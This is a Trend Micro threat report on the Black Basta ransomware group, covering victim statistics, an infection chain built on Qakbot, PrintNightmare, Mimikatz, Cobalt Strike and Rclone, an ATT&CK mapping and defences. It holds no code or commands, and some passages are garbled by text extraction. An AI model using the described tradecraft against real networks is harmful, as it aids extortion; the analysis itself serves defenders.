# Ransomware Spotlight: Black Basta **[trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta)** X Black Basta By Trend Micro Research A relative newcomer in 2022, the Black Basta ransomware group has wasted no time making a name for itself by upgrading its toolset and racking up its victim count around the world mere months since its ransomware was first detected. Learn more about this new ransomware and fortify your organization’s defenses against this threat. View infographic of "Ransomware Spotlight: Black Basta" ----- ac asta s a a so a e g oup ope at g as a so [a e as a se](https://www.trendmicro.com/vinfo/us/security/definition/ransomware-as-a-service-raas) ce ( aaS) t at as t a y spotted p 0 t as s ce p o e [itself to be a formidable threat, as evidenced by its use of double-extortion tactics and](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) [expansion of its attack arsenal to include tools like the](https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html) [Qakbot trojan and](https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html) [PrintNightmare exploit.](https://www.trendmicro.com/en_us/research/21/h/detecting-printnightmare-exploit-attempts-with-trend-micro-vision-one-and-cloud-one.html) Detections of the Black Basta ransomware are currently low, likely because of how recently it was discovered. And like most modern ransomware, Black Basta has a more targeted approach to choosing its victims rather than relying on spray-and-pray tactics. However, the speed with which its malware authors have augmented their attack arsenal and developed a new Linux build merits further investigation of the emerging ransomware gang behind it. ## What organizations need to know about Black Basta The Black Basta [ransomware group quickly gained notoriety after it laid claim to massive breaches earlier this year. On April 20, 2022, a user](https://www.trendmicro.com/vinfo/us/security/definition/ransomware) under the name “Black Basta” sought out corporate network access credentials on underground forums in exchange for a share of the profits from their ransomware attacks. Specifically, the user was in the market for credentials that could compromise organizations based in English[speaking countries, including Australia, Canada, New Zealand, the UK, and the US.](https://cyware.com/research-and-analysis/lets-talk-about-black-basta-ransomware-an-in-depth-analysis-7a19) [Two days later, the American Dental Association (ADA) suffered a cyberattack that led it to shutter multiple systems. Data allegedly stolen from](https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/) the ADA was published on the Black Basta leak site only 96 hours after the attack. While it was previously assumed that the ransomware group used bought or stolen corporate network access credentials to infiltrate its victims’ networks, our analysis of another set of samples monitored within a 72-hour time frame shows a possible correlation between the Qakbot trojan and the Black Basta ransomware. Black Basta continued to evolve, and in June, a Linux build of the ransomware that encrypts VMware ESXi virtual machines was discovered in the wild. Interestingly, the ransomware group does not appear to distribute its malware at random. That Black Basta’s operators have turned to underground markets to acquire network access credentials and have hard-coded a unique ID in every Black Basta build betrays their mature understanding of how ransomware works as a business. While Black Basta may be a newly formed group, the individuals behind it are likely seasoned cybercriminals. ## Top affected countries and industries according to Trend Micro data In this section, we discuss Trend Micro™ Smart Protection Network™ data on Black Basta’s activity from April 1 to July 31, 2022, which refers to detections of the ransomware’s attempts to compromise organizations. Just two countries accounted for over half of the group’s 44 ransomware attack attempts during this period, which were concentrated in the US at 43%, with Austria a distant second at 15%. As Black Basta has sought to purchase network access credentials for organizations located specifically in the US, among other countries, this may explain the higher number of attacks against US-based businesses. ----- Figure 1. The countries with the most Black Basta ransomware attack attempts in terms of infected machines from April 1 to July 31, 2022 _Source: Trend Micro™ Smart Protection Network™_ As of this writing, our detections show that Black Basta activity is spread across many different industries. The group has been observed targeting businesses involved in technology, insurance, manufacturing, and utilities. Although Black Basta is a relatively new arrival to the ransomware scene, its detections have been on a steady climb since the ransomware gang surfaced in April, peaking at 22 attack attempts in June before tapering down to 11 the following month. ----- Figure 2. The numbers of detections of Black Basta ransomware attack attempts in terms of infected machines in each month from April 1 to July 31, 2022 _Source: Trend Micro Smart Protection Network_ ## Targeted regions and industries according to Black Basta’s leak site In this section, we look into the attacks recorded on the Black Basta group’s leak site, which represent successfully compromised organizations that, as of this writing, have refused to pay ransom. Our detections, which pertain to Trend Micro customers, captured only a fraction of the victims found in Black Basta’s leak site. Trend Micro’s open-source intelligence (OSINT) research and investigation of the site show that from April 1 to July 31, 2022, the group compromised a total of 80 organizations. The bulk of Black Basta’ victims were based in North America, which had a victim count of 44, followed by Europe and the Asia-Pacific. More specifically, the US was at the receiving end of most of the attacks, with 38 affected organizations. Many confirmed ransomware attacks also took place in Germany, with 19 victims. ----- Figure 3. The distribution by region of Black Basta’s victim organizations from April 1 to July 31, 2022 _Sources: Black Basta’s leak site and Trend Micro’s OSINT research_ Figure 4. The distribution by country of Black Basta’s victim organizations from April 1 to July 31, 2022 _Sources: Black Basta’s leak site and Trend Micro’s OSINT research_ . . . Black Basta’s attacks affected a variety of organizations. Construction businesses topped the list with a victim count of 10, while businesses involved in professional services came in second with nine victims. Medium-size organizations made up the lion’s share of recorded Black Basta victims. ----- Figure 5. The distribution by industry of Black Basta’s victim organizations from April 1 to July 31, 2022 _Sources: Black Basta’s leak site and Trend Micro’s OSINT research_ Figure 6. The distribution by organization size of Black Basta’s victim organizations from April 1 to July 31, 2022 _Sources: Black Basta’s leak site and Trend Micro’s OSINT research_ ## Infection chain and techniques As Black Basta’s operations are based on the RaaS model, its infection chain might vary depending on the target. The infection chain illustrated below details the variety of tactics and tools the group uses. ----- Figure 7. Black Basta’s infection chain **Initial access** External data reports that a user named “Black Basta” posted on underground forums seeking corporate network access credentials, offering a share of the profit from their attacks as payment. These reports are supported by the fact that a unique ID is hard-coded in each Black Basta build, which could also mean that the ransomware gang does not distribute its malware sporadically. Our internal telemetry shows another set of samples, which were monitored within a 72-hour time frame, that were using Qakbot. The malware is downloaded and executed from a malicious Excel file and then executes certain PowerShell commands as part of its staging phase **Discovery** Black Basta uses PowerShell scripts to scan information about the compromised system or network. It uses Qakbot’s and Cobeacon’s information-gathering capabilities to scan the compromised system or network. It uses third-party tools such as Netcat to scan the compromised system or network. **Defense evasion** Black Basta uses a batch script containing PowerShell commands to disable antimalware applications. It uses Group Policy Objects (GPOs) to disable Windows Defender and Security Center. It reboots the victim’s computer in safe mode to circumvent any antimalware applications. **Privilege escalation** [Black Basta exploits the PrintNightmare vulnerability (CVE-2021-34527) to perform privileged operations and deliver the Cobalt Strike](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) beacon (aka Cobeacon) or other payloads. ----- **Credential access** Black Basta uses Mimikatz to dump credentials. **Lateral movement** Black Basta uses different tools and pieces of malware to spread its ransomware to other remote systems in the network: BITSAdmin PsExec Windows Management Instrumentation (WMI) RDP Qakbot Cobeacon **Exfiltration** Black Basta uses Cobeacon to exfiltrate the stolen data on an established command-and-control (C&C) server. It uses Rclone to exfiltrate data from compromised systems. **Impact** Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable. Multiple builds of Black Basta ransomware have been found in the wild One build restarts the victim’s system in safe mode, most likely for evasion purposes, before performing encryption. This build also modifies the “Fax” service to enable it to run in safe mode and with service-level access. Another build contains only the ransomware’s core capabilities, such as wallpaper defacement, file encryption, and deletion of shadow copies. A newly found build has a new addition: the -bomb argument, which theoretically allows the ransomware to automatically target all connected machines for encryption. The Linux build of the ransomware targets the folder /vmfs/volumes, where images from virtual machines are contained, for encryption. To encrypt other folders, the ransomware actors include the -forcepath argument. Black Basta displays a ransomware note as the victim’s wallpaper directing them to a .txt file with more details. ----- **Other technical details** Black Basta avoids encrypting files in these folders: _$Recycle.Bin_ _Windows_ _Local Settings_ _Application Data_ _boot_ It avoids encrypting files with these strings in their file names: _OUT.txt_ _NTUSER.DAT_ _readme.txt (the ransom note)_ _dlaksjdoiwq.jpg (a desktop wallpaper found in the %TEMP% folder)_ _fkdjsadasd.ico (an icon used for encrypted files, found in the %TEMP% folder)_ It drops a ransom note as a .txt file in an encrypted folder in the victim’s machine. Figure 9. An example of the contents of the ransom note .txt file ## MITRE ATT&CK tactics and techniques **Initial** **access** **Execution** **Privilege** **escalation** **Defense** **evasion** **Credential** **access** **Discovery** **Lateral** **movement** **Exfiltration** **Impact** ----- **Initial** **access** **Execution** **Defense** **evasion** **T1112 - Modify** registry _Modifies registry_ _entries to_ _enable it to_ _replace the_ _desktop_ _wallpaper, set_ _the icon_ _associated with_ _encrypted files,_ _establish_ _persistence,_ _and disable_ _defenses._ **T1484.001 -** Domain policy modification: Group policy modification _Employs a_ _technique_ _involving the_ _creation of a_ _Group Policy_ _Object (GPO)_ _on a_ _compromised_ _domain_ _controller, which_ _will push out the_ _changes_ _(disable_ _defenses) to the_ _Windows_ _registry of_ _domain-joined_ _hosts._ **T1562.001 -** Impair defenses: Disable or modify tools _Disables_ _Windows_ _Defender and_ _Security Center._ **T1562.009 -** Impair defenses: Safe mode boot _Disables_ _Windows_ _recovery and_ _repair features_ _and restarts the_ _machine in safe_ _mode._ **T1620 -** Reflective code loading _Has some_ _builds that are_ _known to use_ _reflective code_ _loading when_ _executing_ _themselves._ **Credential** **access** **Discovery** **Lateral** **movement** **Exfiltration** **Impact** **T1078 - Valid** accounts _Has been_ _reported_ _buying_ _compromised_ _accounts on_ _underground_ _forums to_ _access victim_ _systems._ **T1566.001 -** Phishing: Spearphishing attachment _Mirrors_ _technique_ _used by_ _Qakbot_ _operators to_ _distribute_ _their payload_ _that will_ _deliver the_ _ransomware._ **T1059.003 -** Command and scripting interpreter _Uses various_ _scripting_ _interpreters like_ _PowerShell_ _and Windows_ _command_ _shell._ **T1569.002 -** System services: Service execution _Stops and_ _deletes the_ _service named_ _“Fax”, which it_ _then_ _impersonates_ _for its_ _encryption_ _routine._ **T1047 -** Windows Management Instrumentation _Has been_ _observed to_ _use Windows_ _Management_ _Instrumentation_ _(WMI) to_ _spread and_ _execute files_ _over the_ _Network._ **Privilege** **escalation** **T1068 -** Exploitation for privilege escalation _Exploits the_ _PrintNightmare_ _vulnerability_ _(CVE-2021-_ _34527) to_ _perform_ _privileged_ _operations_ **T1003 -** OS credential dumping _Uses_ _Mimikatz to_ _dump_ _credentials._ **T1082 -** System information discovery _Uses tools_ _for local_ _system_ _scans._ **T1018 -** Remote system discovery _Uses tools_ _for remote_ _network_ _scans._ **T1083 - File** and directory discovery _Searches_ _for specific_ _files and_ _directories_ _related to its_ _ransomware_ _encryption._ **T1570 -** Lateral tool transfer _Uses tools_ _like_ _PsExec_ _and_ _BITSAdmin_ _to spread_ _the_ _malware_ _laterally_ _across the_ _network._ **T1021.001** - Remote services: Remote Desktop Protocol _Uses RDP_ _to spread_ _and_ _execute_ _the_ _malware_ _across the_ _network._ **T1041 -** Exfiltration over C&C channel _Uses an_ _established_ _command-_ _and-control_ _(C&C)_ _channel to_ _exfiltrate_ _data._ **T1567 -** Exfiltration over web service _Uses a tool_ _like Rclone_ _to copy_ _stolen data_ _from a_ _client to its_ _cloud_ _server._ **T1490 -** Inhibit system recovery _Deletes_ _shadow_ _copies._ **T1489 -** Service stop _Stops and_ _deletes a_ _service_ _named “Fax”,_ _which it then_ _impersonates_ _for its_ _encryption_ _routine._ **T1486 - Data** encrypted for impact _Encrypts files_ _and adds the_ _extension_ “.basta”. **T1491 -** Defacement _Replaces the_ _desktop_ _wallpaper to_ _display the_ _ransom note._ ----- ## Summary of tools, exploit, and other malware used Security teams can keep an eye out for the presence of these tools, exploit, and other malware that are typically used in Black Basta’s ransomware attacks: **Credential** **access** **Lateral** **movement** **Execution** **Exfiltration** **Initial access** **Discovery** **Privilege** **escalation** Spear phishing Netcat PrintNightmare vulnerability (CVE-202134527) Mimikatz BITSAdmin Coroxy PsExec RDP WMI PowerShell Windows command shell WMI Cobeacon Rclone **Command and** **control** Cobeacon Qakbot(Qbo ## Security recommendations [Security researchers have speculated that Black Basta might be an offshoot of the infamous Conti ransomware gang. It has also exhibited](https://www.csoonline.com/article/3669256/black-basta-new-ransomware-threat-aiming-for-the-big-league.html) similarities to the Black Matter ransomware gang, including a resemblance between their respective leak sites. Its possible connection to these ransomware groups might explain the high level of in-house expertise behind Black Basta’s attacks. In defending systems against threats like Black Basta, organizations can benefit from establishing security frameworks that can allocate resources systematically for establishing solid defenses against ransomware. Here are some best practices that can be included in these frameworks: **Audit and inventory** Take an inventory of assets and data. Identify authorized and unauthorized devices and software. Make an audit of event and incident logs. **Configure and monitor** Manage hardware and software configurations. Grant admin privileges and access only when necessary to an employee’s role. Monitor network ports, protocols, and services. Activate security configurations on network infrastructure devices such as firewalls and routers. Establish a software allowlist that only executes legitimate applications. **Patch and update** Conduct regular vulnerability assessments. Perform patching or virtual patching for operating systems and applications. Update software and applications to their latest versions. **Protect and recover** Implement data protection, backup, and recovery measures. Enable multifactor authentication (MFA). **Secure and defend** Employ sandbox analysis to block malicious emails. Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network. Detect early signs of an attack such as the presence of suspicious tools in the system. Use advanced detection technologies such as those powered by AI and machine learning. ----- Regularly train and assess employees on security skills. Conduct red-team exercises and penetration tests. A multilayered approach can help organizations guard possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can also help protect enterprises: [Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools](https://www.trendmicro.com/en_us/business/products/detection-response.html) early on before the ransomware can do irreversible damage to the system. [Trend Micro Cloud One™ – Workload Security protects systems against both known and unknown threats that exploit vulnerabilities.](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) This protection is made possible through techniques such as virtual patching and machine learning. [Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) malicious emails, including phishing emails that can serve as entry points for ransomware. [Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) and ransomware, ensuring the protection of endpoints. ## Indicators of compromise (IOCs) [The indicators of compromise (IOCs) for the threat discussed in this article can be found here. Actual indicators might vary per attack.](https://documents.trendmicro.com/assets/txt/IOCs_BlackBasta_Spotlight-1gMstIg.txt) HIDE **Like it? Add this infographic to your site:** 1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V). Image will appear the same size as you see above. -----